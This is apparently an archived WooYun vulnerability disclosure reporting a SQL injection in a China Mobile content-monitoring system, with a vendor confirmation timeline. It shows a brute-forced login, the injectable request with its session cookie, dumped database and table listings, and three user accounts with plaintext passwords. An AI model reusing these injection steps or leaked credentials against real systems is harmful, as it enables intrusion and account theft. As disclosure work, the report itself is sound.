当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152395

漏洞标题:中国移动不良信息拨测系统SQL注入漏洞(内容让人羞羞)

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2015-11-06 18:22

修复时间:2015-12-25 10:32

公开时间:2015-12-25 10:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-10: 厂商已经确认,细节仅向厂商公开
2015-11-20: 细节向核心白帽子及相关领域专家公开
2015-11-30: 细节向普通白帽子公开
2015-12-10: 细节向实习白帽子公开
2015-12-25: 细节向公众公开

简要描述:

中国移动不良信息拨测系统sql注入漏洞

详细说明:

**.**.**.**:11222/ncss/
爆破之
wanghua 123456

GET /ncss/auditmana/webTree.do?tr=listWebSites&treeId=**.**.**.*** HTTP/1.1
Host: **.**.**.**:11222
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=8D4D5550134B823EFFF04AEF85533DCE
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3


available databases [3]:
[*] information_schema
[*] ncss
[*] test

Database: ncss                                                                                                         
[1020 tables]
+---------------------------------+
| acquisition_conf_policy         |
| alarm_forward_info              |
| alarm_info                      |
| alarm_msg_his                   |
| alarm_msg_info                  |
| alarm_msg_per                   |
| alarm_policy                    |
| alarm_report_datas              |
| alarm_report_his                |
| alarm_report_info               |
| alarm_rule                      |
| area_info                       |
| audit_statinfo                  |
| audit_user_count                |
| con_test                        |
| daily_audit_time_report         |
| data_storage_sheet              |
| day_audit_time_report           |
| day_bidwinning_amount           |
| day_hostname_stat               |
| day_hostname_stat_0111          |
| day_report_audit_area_monitor   |
| day_report_audit_info           |
| day_report_audit_visitsrank     |
| day_server_stat                 |
| day_work_load_report            |
| department                      |
| domain_tree                     |
| downloadblack                   |
| equip_conf_send_status          |
| evidence                        |
| evidence_video                  |
| front_acquisition_policy        |
| front_image_policy              |
| front_info                      |
| front_keyword_policy            |
| front_text_policy               |
| host_display                    |
| host_reason                     |
| host_time_baseinfo              |
| hostname_test                   |
| hour_hostname_0105rd            |
| hour_hostname_stat              |
| hour_server_stat                |
| idc_room                        |
| image_conf_policy               |
| image_conf_send_status          |
| ip_area                         |
| keyword                         |
| keyword_conf_policy             |
| keyword_conf_send_status        |
| keyword_copy                    |
| keyword_policy_type             |
| keyword_type                    |
| log_black_list_submit           |
| log_black_list_submit_item      |
| log_record                      |
| log_sys_record                  |
| mobile_area                     |
| month_bidwinning_amount         |
| month_hostname_stat             |
| month_server_stat               |
| ncss_user                       |
省略...


Table: ncss_user
[3 entries]
admin jhkj9527
wanghua 123456
yaotingting 123

漏洞证明:

屏幕快照 2015-11-06 下午2.40.09.png


屏幕快照 2015-11-06 下午2.41.57.png


屏幕快照 2015-11-06 下午2.44.43.png


屏幕快照 2015-11-06 下午2.47.00.png


屏幕快照 2015-11-06 下午2.49.26.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-10 10:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无